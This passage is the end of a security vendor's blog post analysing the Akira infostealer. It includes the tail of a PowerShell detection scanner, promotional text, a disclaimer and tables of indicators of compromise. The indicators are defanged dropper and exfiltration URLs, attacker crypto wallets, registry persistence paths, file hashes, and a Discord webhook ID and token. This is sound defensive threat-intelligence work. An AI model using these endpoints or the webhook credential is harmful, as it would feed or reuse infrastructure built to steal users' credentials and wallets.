@{Label='Location';   Expression={$_.Location}},\n",[102,19536,19537],{"class":104,"line":13724},[102,19538,19539],{},"            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n",[102,19541,19543],{"class":104,"line":19542},79,[102,19544,19545],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[102,19547,19549],{"class":104,"line":19548},80,[102,19550,11519],{"emptyLinePlaceholder":2181},[102,19552,19554],{"class":104,"line":19553},81,[102,19555,19556],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[102,19558,19560],{"class":104,"line":19559},82,[102,19561,10086],{},[102,19563,19565],{"class":104,"line":19564},83,[102,19566,19567],{},"else {\n",[102,19569,19571],{"class":104,"line":19570},84,[102,19572,19573],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[102,19575,19577],{"class":104,"line":19576},85,[102,19578,10086],{},[102,19580,19582],{"class":104,"line":19581},86,[102,19583,11519],{"emptyLinePlaceholder":2181},[102,19585,19587],{"class":104,"line":19586},87,[102,19588,19589],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[102,19591,19593],{"class":104,"line":19592},88,[102,19594,19595],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[52,19597],{"className":19598},[8535,8536],[25,19600,19602],{"id":19601},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[12,19604,31],{},[12,19606,19607,19608],{},"Most security operations centers stop at containment.\n",[251,19609,19610],{},"We don’t.",[12,19612,19613],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[12,19615,19616],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[12,19618,19619,19620,1013],{},"This philosophy is why we built the ",[251,19621,19622],{},"Akira Compromise Reporter",[12,19624,19625],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[1254,19627,19628,19631,19634],{},[1257,19629,19630],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[1257,19632,19633],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[1257,19635,19636],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[12,19638,19639],{},[2642,19640],{"alt":19641,"src":19642},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[12,19644,19645],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. ybersecurity, done right, isn’t about simply reacting to incidents—It’s about understanding, adapting, and always staying one step ahead.",[12,19647,19648],{},[251,19649,19650],{},"That’s the glueckkanja CSOC difference.",[25,19652,19654],{"id":19653},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[12,19656,31],{},[12,19658,19659],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. All URLs are deliberately obfuscated to prevent accidental clicks.",[12,19661,19662],{},[251,19663,19664],{},"Abbreviations:",[1254,19666,19667,19673],{},[1257,19668,19669,19672],{},[251,19670,19671],{},"TG:"," Telegram reporting channel",[1257,19674,19675,19678],{},[251,19676,19677],{},"Alt:"," Alternate (fallback) endpoint",[41,19680,19682],{"id":19681},"_1-domains-urls","1. Domains & URLs",[12,19684,47],{},[417,19686,420,19688],{"className":19687,"style":12346},[18762],[438,19689,19690,420,19702,420,19715,420,19728,420,19741,420,19754,420,19767,420,19780,420,19796,420,19812,420,19825,420,19838,420,19851,420,19864,420,19877,420,19890,420,19903,420,19916,420,19929,420,19942,420,19956,420,19969],{},[426,19691,424,19692,424,19696,424,19700,420],{},[430,19693,19695],{"style":19694},"text-align: left; width: 18%;","Category",[430,19697,19699],{"style":19698},"text-align: left; width: 52%;","Obfuscated URL",[430,19701,12521],{"style":12514},[426,19703,424,19704,424,19707,424,19712,420],{},[443,19705,19706],{},"Primary Injection",[443,19708,19709],{},[63,19710,19711],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[443,19713,19714],{},"Initial attacker webhook endpoint",[426,19716,424,19717,424,19720,424,19725,420],{"style":12370},[443,19718,19719],{},"Fallback Injection",[443,19721,19722],{},[63,19723,19724],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[443,19726,19727],{},"Alternate injector endpoint",[426,19729,424,19730,424,19733,424,19738,420],{},[443,19731,19732],{},"Error Reporting (TG)",[443,19734,19735],{},[63,19736,19737],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[443,19739,19740],{},"Telegram error/log reporting URL",[426,19742,424,19743,424,19746,424,19751,420],{"style":12370},[443,19744,19745],{},"Error Reporting (Alt)",[443,19747,19748],{},[63,19749,19750],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[443,19752,19753],{},"Alternate error/log reporting URL",[426,19755,424,19756,424,19759,424,19764,420],{},[443,19757,19758],{},"Vanity Bot (TG)",[443,19760,19761],{},[63,19762,19763],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[443,19765,19766],{},"Vanity address notification endpoint",[426,19768,424,19769,424,19772,424,19777,420],{"style":12370},[443,19770,19771],{},"Vanity Bot (Alt)",[443,19773,19774],{},[63,19775,19776],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[443,19778,19779],{},"Alternate vanity notification endpoint",[426,19781,424,19782,424,19785,424,19790,420],{},[443,19783,19784],{},"Exodus Injection",[443,19786,19787],{},[63,19788,19789],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[443,19791,19792,19793,19795],{},"Electron ",[63,19794,12252],{}," app module",[426,19797,424,19798,424,19801,424,19806,420],{"style":12370},[443,19799,19800],{},"Atomic Injection",[443,19802,19803],{},[63,19804,19805],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[443,19807,19792,19808,19811],{},[63,19809,19810],{},"AtomicWallet"," module",[426,19813,424,19814,424,19817,424,19822,420],{},[443,19815,19816],{},"Updater Download",[443,19818,19819],{},[63,19820,19821],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[443,19823,19824],{},"Persistence dropper executable",[426,19826,424,19827,424,19830,424,19835,420],{"style":12370},[443,19828,19829],{},"Gofile API List",[443,19831,19832],{},[63,19833,19834],{},"https[:]//api.gofile[.]io/servers",[443,19836,19837],{},"Retrieves best GoFile upload server",[426,19839,424,19840,424,19843,424,19848,420],{},[443,19841,19842],{},"Discord Token Check",[443,19844,19845],{},[63,19846,19847],{},"https[:]//discordapp[.]com/api/v9/users/@me",[443,19849,19850],{},"Validates stolen Discord token",[426,19852,424,19853,424,19856,424,19861,420],{"style":12370},[443,19854,19855],{},"Discord Billing Info",[443,19857,19858],{},[63,19859,19860],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[443,19862,19863],{},"Retrieves billing methods",[426,19865,424,19866,424,19869,424,19874,420],{},[443,19867,19868],{},"Google OAuth Replay",[443,19870,19871],{},[63,19872,19873],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[443,19875,19876],{},"Replays stolen Google session tokens",[426,19878,424,19879,424,19882,424,19887,420],{"style":12370},[443,19880,19881],{},"IP Check (hosting)",[443,19883,19884],{},[63,19885,19886],{},"http[:]//ip-api[.]com/line/?fields=hosting",[443,19888,19889],{},"Hosting environment detection",[426,19891,424,19892,424,19895,424,19900,420],{},[443,19893,19894],{},"IP Lookup (geo)",[443,19896,19897],{},[63,19898,19899],{},"http[:]//ip-api[.]com/json/{ip}",[443,19901,19902],{},"Geolocation by IP",[426,19904,424,19905,424,19908,424,19913,420],{"style":12370},[443,19906,19907],{},"Public IP Retrieval",[443,19909,19910],{},[63,19911,19912],{},"https[:]//api[.]ipify[.]org",[443,19914,19915],{},"Fetches external IP address",[426,19917,424,19918,424,19921,424,19926,420],{},[443,19919,19920],{},"File.io Upload",[443,19922,19923],{},[63,19924,19925],{},"https[:]//file[.]io/",[443,19927,19928],{},"Secondary exfiltration channel",[426,19930,424,19931,424,19934,424,19939,420],{"style":12370},[443,19932,19933],{},"Oshi.at Upload",[443,19935,19936],{},[63,19937,19938],{},"http[:]//oshi[.]at/",[443,19940,19941],{},"Tertiary exfiltration channel",[426,19943,424,19944,424,19947,424,19953,420],{},[443,19945,19946],{},"JS Dropper Primary",[443,19948,19949],{},[2672,19950,19952],{"href":19951,"target":4914},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[443,19954,19955],{},"Remote reference to actual ZIP URL",[426,19957,424,19958,424,19961,424,19966,420],{"style":12370},[443,19959,19960],{},"JS Dropper Fallback 1",[443,19962,19963],{},[2672,19964,19965],{"href":11269,"target":4914},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[443,19967,19968],{},"Alternative payload ZIP",[426,19970,424,19971,424,19974,424,19979,420],{},[443,19972,19973],{},"JS Dropper Fallback 2",[443,19975,19976],{},[2672,19977,19978],{"href":11274,"target":4914},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[443,19980,19981],{},"Secondary fallback payload ZIP",[52,19983],{"className":19984},[8535,8536],[41,19986,19988],{"id":19987},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[12,19990,47],{},[417,19992,420,19994],{"className":19993,"style":12346},[18762],[438,19995,19996,420,20004,420,20014,420,20024,420,20034,420,20043,420,20053,420,20063,420,20073,420,20083,420,20093],{},[426,19997,424,19998,424,20001,420],{},[430,19999,20000],{"style":18773},"Currency",[430,20002,20003],{"style":12514},"Address",[426,20005,424,20006,424,20009,420],{},[443,20007,20008],{},"BTC",[443,20010,20011],{},[63,20012,20013],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[426,20015,424,20016,424,20019,420],{"style":12370},[443,20017,20018],{},"ETH",[443,20020,20021],{},[63,20022,20023],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[426,20025,424,20026,424,20029,420],{},[443,20027,20028],{},"DOGE",[443,20030,20031],{},[63,20032,20033],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[426,20035,424,20036,424,20039,420],{"style":12370},[443,20037,20038],{},"LTC",[443,20040,20041],{},[63,20042,18803],{},[426,20044,424,20045,424,20048,420],{},[443,20046,20047],{},"XMR",[443,20049,20050],{},[63,20051,20052],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[426,20054,424,20055,424,20058,420],{"style":12370},[443,20056,20057],{},"BCH",[443,20059,20060],{},[63,20061,20062],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[426,20064,424,20065,424,20068,420],{},[443,20066,20067],{},"DASH",[443,20069,20070],{},[63,20071,20072],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[426,20074,424,20075,424,20078,420],{"style":12370},[443,20076,20077],{},"TRX",[443,20079,20080],{},[63,20081,20082],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[426,20084,424,20085,424,20088,420],{},[443,20086,20087],{},"XRP",[443,20089,20090],{},[63,20091,20092],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[426,20094,424,20095,424,20098,420],{"style":12370},[443,20096,20097],{},"XLM",[443,20099,20100],{},[63,20101,20102],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[52,20104],{"className":20105},[8535,8536],[41,20107,20109],{"id":20108},"_3-registry-keys-paths","3. Registry Keys / Paths",[12,20111,47],{},[417,20113,420,20115],{"className":20114,"style":12346},[18762],[438,20116,20117,420,20124,420,20134,420,20144,420,20157],{},[426,20118,424,20119,424,20122,420],{},[430,20120,9340],{"style":20121},"text-align: left; width: 60%;",[430,20123,8885],{"style":12514},[426,20125,424,20126,424,20131,420],{},[443,20127,20128],{},[63,20129,20130],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[443,20132,20133],{},"Checks for virtual GPU driver signature",[426,20135,424,20136,424,20141,420],{"style":12370},[443,20137,20138],{},[63,20139,20140],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[443,20142,20143],{},"Checks for virtual GPU provider name",[426,20145,424,20146,424,20154,420],{},[443,20147,20148,20151,20152,1288],{},[63,20149,20150],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[251,20153,9351],{},[443,20155,20156],{},"Persistence via Run key (Updater.exe)",[426,20158,424,20159,424,20163,420],{"style":12370},[443,20160,20161],{},[63,20162,9359],{},[443,20164,20165],{},"Persistence Executable",[52,20167],{"className":20168},[8535,8536],[41,20170,20172],{"id":20171},"_5-files-hashes","5. Files & Hashes",[12,20174,47],{},[417,20176,420,20178],{"className":20177,"style":12346},[18762],[438,20179,20180,420,20191,420,20203,420,20215,420,20228,420,20240,420,20252,420,20264,420,20276,420,20289,420,20301,420,20314,420,20326],{},[426,20181,424,20182,424,20184,424,20188,420],{},[430,20183,19106],{"style":19694},[430,20185,20187],{"style":20186},"text-align: left; width: 62%;","SHA256",[430,20189,20190],{"style":12514},"Size (bytes)",[426,20192,424,20193,424,20195,424,20200,420],{},[443,20194,9509],{},[443,20196,20197],{},[63,20198,20199],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[443,20201,20202],{},"63936274",[426,20204,424,20205,424,20207,424,20212,420],{"style":12370},[443,20206,8300],{},[443,20208,20209],{},[63,20210,20211],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[443,20213,20214],{},"162036224",[426,20216,424,20217,424,20220,424,20225,420],{},[443,20218,20219],{},"jscrypter.js",[443,20221,20222],{},[63,20223,20224],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[443,20226,20227],{},"1429",[426,20229,424,20230,424,20232,424,20237,420],{"style":12370},[443,20231,10491],{},[443,20233,20234],{},[63,20235,20236],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[443,20238,20239],{},"30138",[426,20241,424,20242,424,20244,424,20249,420],{},[443,20243,10488],{},[443,20245,20246],{},[63,20247,20248],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[443,20250,20251],{},"7155",[426,20253,424,20254,424,20256,424,20261,420],{"style":12370},[443,20255,10421],{},[443,20257,20258],{},[63,20259,20260],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[443,20262,20263],{},"211",[426,20265,424,20266,424,20268,424,20273,420],{},[443,20267,8304],{},[443,20269,20270],{},[63,20271,20272],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[443,20274,20275],{},"205210",[426,20277,424,20278,424,20281,424,20286,420],{"style":12370},[443,20279,20280],{},"exodus.asar",[443,20282,20283],{},[63,20284,20285],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[443,20287,20288],{},"132486332",[426,20290,424,20291,424,20293,424,20298,420],{},[443,20292,9568],{},[443,20294,20295],{},[63,20296,20297],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[443,20299,20300],{},"28454",[426,20302,424,20303,424,20306,424,20311,420],{"style":12370},[443,20304,20305],{},"download.dat",[443,20307,20308],{},[63,20309,20310],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[443,20312,20313],{},"21142",[426,20315,424,20316,424,20318,424,20323,420],{},[443,20317,10549],{},[443,20319,20320],{},[63,20321,20322],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[443,20324,20325],{},"32375391",[426,20327,424,20328,424,20330,424,20335,420],{"style":12370},[443,20329,8296],{},[443,20331,20332],{},[63,20333,20334],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[443,20336,20337],{},"37652937",[52,20339],{"className":20340},[8535,8536],[41,20342,20344],{"id":20343},"_5-discord-telegram-identifier","5. Discord & Telegram Identifier",[12,20346,47],{},[417,20348,420,20350],{"className":20349,"style":12346},[18762],[438,20351,20352,420,20358,420,20368,420,20378],{},[426,20353,424,20354,424,20356,420],{},[430,20355,19695],{"style":13965},[430,20357,436],{"style":12514},[426,20359,424,20360,424,20363,420],{},[443,20361,20362],{},"Discord Webhook ID",[443,20364,20365],{},[63,20366,20367],{},"1226766972675428372",[426,20369,424,20370,424,20373,420],{"style":12370},[443,20371,20372],{},"Discord Webhook Token",[443,20374,20375],{},[63,20376,20377],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[426,20379,424,20380,424,20383,420],{},[443,20381,20382],{},"Telegram ID",[443,20384,20385],{},[63,20386,20387],{},"5035121855",[52,20389],{"className":20390},[8535,8536],[25,20392,20394],{"id":20393},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[12,20396,31],{},[12,20398,20399],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[12,20401,20402],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[12,20404,20405],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[12,20407,20408],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[12,20410,20411],{},"Take the next step in securing your organization's digital assets.",[12,20413,20414],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[12,20416,20417],{},[251,20418,20419],{},"Empower your defense with glueckkanja CSOC.",[25,20421,20423],{"id":20422},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[12,20425,31],{},[12,20427,20428],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[12,20430,20431],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[12,20433,20434],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[12,20436,20437],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[12,20439,20440],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[12,20442,20443],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[2127,20445,20446],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":65,"searchDepth":111,"depth":111,"links":20448},[20449,20450,20451,20452,20463,20464,20465,20466,20467,20468,20469,20470,20472,20473,20474,20475,20476,20477,20478,20479,20480,20483,20491,20492,20493,20499,20517,20535,20536,20537,20538,20546,20553,20560,20569,20576,20577,20578,20579,20580,20581,20582,20583,20584,20585,20586,20587,20588,20589,20590,20591],{"id":8426,"depth":111,"text":8427},{"id":8474,"depth":111,"text":8475},{"id":8494,"depth":111,"text":8495},{"id":8548,"depth":111,"text":8549,"children":20453},[20454,20455,20457,20459,20461],{"id":8568,"depth":329,"text":8569},{"id":8620,"depth":329,"text":20456},"2.1.2 Updater.exe – Initial Loader",{"id":8725,"depth":329,"text":20458},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":8843,"depth":329,"text":20460},"2.1.4 cmd.exe & PowerShell Relay",{"id":8953,"depth":329,"text":20462},"2.1.5 python.exe with astor.py",{"id":9087,"depth":111,"text":9088},{"id":9167,"depth":111,"text":9168},{"id":9245,"depth":111,"text":9246},{"id":9324,"depth":111,"text":9325},{"id":9391,"depth":111,"text":9392},{"id":9471,"depth":111,"text":9472},{"id":9580,"depth":111,"text":9581},{"id":9697,"depth":111,"text":20471},"4.2 AMSI Bypass Technique (Class: gofor4msi)",{"id":9880,"depth":111,"text":9881},{"id":10001,"depth":111,"text":10002},{"id":10099,"depth":111,"text":10100},{"id":10195,"depth":111,"text":10196},{"id":10270,"depth":111,"text":10271},{"id":10340,"depth":111,"text":10341},{"id":10400,"depth":111,"text":10401},{"id":10535,"depth":111,"text":10536},{"id":10596,"depth":111,"text":10597,"children":20481},[20482],{"id":10608,"depth":329,"text":10609},{"id":10957,"depth":111,"text":10958,"children":20484},[20485,20486,20487,20488,20489,20490],{"id":10966,"depth":329,"text":10967},{"id":11080,"depth":329,"text":11081},{"id":11277,"depth":329,"text":11278},{"id":11564,"depth":329,"text":11565},{"id":11640,"depth":329,"text":11641},{"id":11800,"depth":329,"text":11801},{"id":12035,"depth":111,"text":12036},{"id":12081,"depth":111,"text":12082},{"id":12093,"depth":111,"text":12094,"children":20494},[20495,20496,20497,20498],{"id":12099,"depth":329,"text":12100},{"id":12143,"depth":329,"text":12144},{"id":12205,"depth":329,"text":12206},{"id":12240,"depth":329,"text":12241},{"id":12276,"depth":111,"text":20500,"children":20501},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[20502,20503,20504,20505,20507,20508,20509,20510,20511,20512,20513,20514,20515,20516],{"id":12285,"depth":329,"text":12286},{"id":12300,"depth":329,"text":12301},{"id":12340,"depth":329,"text":12341},{"id":12429,"depth":329,"text":20506},"7.3.4 VmProtect Architecture",{"id":12782,"depth":329,"text":12783},{"id":12848,"depth":329,"text":12849},{"id":12917,"depth":329,"text":12918},{"id":12981,"depth":329,"text":12982},{"id":13049,"depth":329,"text":13050},{"id":13106,"depth":329,"text":13107},{"id":13204,"depth":329,"text":13205},{"id":13273,"depth":329,"text":13274},{"id":13729,"depth":329,"text":13730},{"id":13776,"depth":329,"text":13777},{"id":13790,"depth":111,"text":13791,"children":20518},[20519,20520,20522,20524,20526,20528,20530,20532,20534],{"id":13949,"depth":329,"text":13950},{"id":14057,"depth":329,"text":20521},"7.4.2 Password Dumper (Chromium.GetPasswords)",{"id":14179,"depth":329,"text":20523},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":14261,"depth":329,"text":20525},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":14341,"depth":329,"text":20527},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":14468,"depth":329,"text":20529},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":14538,"depth":329,"text":20531},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":14601,"depth":329,"text":20533},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":14679,"depth":329,"text":14680},{"id":14718,"depth":111,"text":14719},{"id":15050,"depth":111,"text":15051},{"id":15164,"depth":111,"text":15165},{"id":15492,"depth":111,"text":15493,"children":20539},[20540,20541,20542,20543,20544,20545],{"id":15501,"depth":329,"text":15502},{"id":15652,"depth":329,"text":15653},{"id":15758,"depth":329,"text":15759},{"id":15883,"depth":329,"text":15884},{"id":15950,"depth":329,"text":15951},{"id":16075,"depth":329,"text":16076},{"id":16180,"depth":111,"text":20547,"children":20548},"7.9. Discord and Telegram Token Theft (Class: Discord)",[20549,20550,20551,20552],{"id":16194,"depth":329,"text":16195},{"id":16325,"depth":329,"text":16326},{"id":16568,"depth":329,"text":16569},{"id":16649,"depth":329,"text":16650},{"id":16719,"depth":111,"text":16720,"children":20554},[20555,20557,20558,20559],{"id":16732,"depth":329,"text":20556},"7.10.1 Data Class Initialization",{"id":16830,"depth":329,"text":16831},{"id":16950,"depth":329,"text":16951},{"id":17015,"depth":329,"text":17016},{"id":17092,"depth":111,"text":20561,"children":20562},"7.11 File Grabber (Class: Utils.steal_files)",[20563,20564,20565,20566,20567,20568],{"id":17104,"depth":329,"text":17105},{"id":17175,"depth":329,"text":17176},{"id":17237,"depth":329,"text":17238},{"id":17270,"depth":329,"text":17271},{"id":17299,"depth":329,"text":17300},{"id":17478,"depth":329,"text":17479},{"id":17586,"depth":111,"text":17587,"children":20570},[20571,20572,20573,20574,20575],{"id":17595,"depth":329,"text":17596},{"id":17610,"depth":329,"text":17611},{"id":17689,"depth":329,"text":17690},{"id":17838,"depth":329,"text":17839},{"id":18071,"depth":329,"text":18072},{"id":18422,"depth":111,"text":18423},{"id":18453,"depth":111,"text":18454},{"id":18577,"depth":111,"text":18578},{"id":18688,"depth":111,"text":18689},{"id":18739,"depth":111,"text":18740},{"id":18916,"depth":111,"text":18917},{"id":18966,"depth":111,"text":18967},{"id":19010,"depth":111,"text":19011},{"id":19050,"depth":111,"text":19051},{"id":19141,"depth":111,"text":19142},{"id":19158,"depth":111,"text":19159},{"id":19681,"depth":111,"text":19682},{"id":19987,"depth":111,"text":19988},{"id":20108,"depth":111,"text":20109},{"id":20171,"depth":111,"text":20172},{"id":20343,"depth":111,"text":20344},{"lang":2171,"seoTitle":20593,"titleClass":2173,"date":20594,"categories":20595,"blogtitlepic":20596,"socialimg":20597,"customExcerpt":20598,"keywords":20599,"maxContent":2181,"asideNav":20600,"footer":20649,"contactInContent":20650,"published":2181,"hreflang":20666},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[2176],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat 